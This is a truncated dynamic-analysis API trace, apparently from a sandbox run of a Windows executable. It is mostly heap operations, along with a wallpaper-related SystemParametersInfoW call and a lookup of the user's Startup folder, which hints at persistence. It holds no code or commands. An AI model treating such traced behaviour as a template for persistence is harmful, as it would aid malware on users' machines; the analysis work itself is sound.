[0261.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0261.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0261.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0261.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0261.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0261.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0261.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0261.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0261.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0261.358] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0261.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0261.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0261.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0261.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0261.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0261.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0261.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0261.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0261.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0261.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0261.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0261.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0261.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0261.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0261.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0261.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0261.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0261.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0261.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0261.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0261.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0261.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0261.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0261.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0261.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0261.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0261.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0261.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0261.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0261.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0261.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0261.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0261.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0261.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0261.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0261.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0261.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0261.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0261.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0261.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0261.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0261.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0261.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0261.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0261.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0261.360] LoadLibraryW (lpLibFileName="user32.dll") returned 0x76240000 [0261.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0261.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0261.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0261.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f6f20 [0261.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x29f6f20, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0261.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0261.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0261.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0261.363] GetProcAddress (hModule=0x76240000, lpProcName="SystemParametersInfoW") returned 0x7626f210 [0261.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0261.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0261.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0261.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0261.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0261.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0261.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0261.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0261.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0261.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0261.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0261.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0261.365] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0261.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x38656b8 [0261.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7080 [0261.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0261.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0261.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0261.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0261.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0261.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0261.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0261.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0261.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0261.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0261.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0261.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0261.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0261.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0261.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0261.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0261.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0261.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0261.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0261.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0261.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0261.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0261.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0261.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0261.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0261.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0261.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0261.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0261.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0261.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0261.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0261.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0261.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0261.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0261.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0261.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0261.605] FreeLibrary (hLibModule=0x76240000) returned 1 [0261.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0261.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0261.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0261.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0261.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0261.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0261.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0261.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0261.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0261.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0261.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0261.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0261.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0261.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0261.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0261.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0261.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0261.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0261.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0261.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0261.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0261.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0261.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0261.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0261.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0261.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0261.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0261.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0261.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0261.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0261.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x38658e0 [0261.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0261.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0261.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38656b8 | out: hHeap=0x2af0000) returned 1 [0261.606] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0261.606] TranslateMessage (lpMsg=0x8cf708) returned 0 [0261.606] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0261.606] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0261.606] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0261.606] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0261.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0261.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0261.607] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0261.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0261.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0261.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0261.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0261.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0261.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0261.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0261.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0261.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0261.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0261.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0261.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0261.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0261.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0261.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0261.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0261.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0261.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0261.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0261.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0261.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0261.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0261.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0261.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0261.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0261.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0261.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0261.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0261.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38658e0 | out: hHeap=0x2af0000) returned 1 [0261.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0261.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0261.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0261.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0261.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0261.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0261.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0261.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0261.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0261.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0261.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0261.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0261.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0261.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0261.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0261.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0261.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0261.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0261.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0261.610] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0261.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0261.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0261.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0261.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0261.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0261.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0261.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0261.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0261.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0261.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0261.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0261.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0261.611] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0261.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0261.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0261.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab668 [0261.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0261.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0261.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab578 [0261.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0261.611] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8cf298 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0261.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0261.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a683a8 [0261.612] 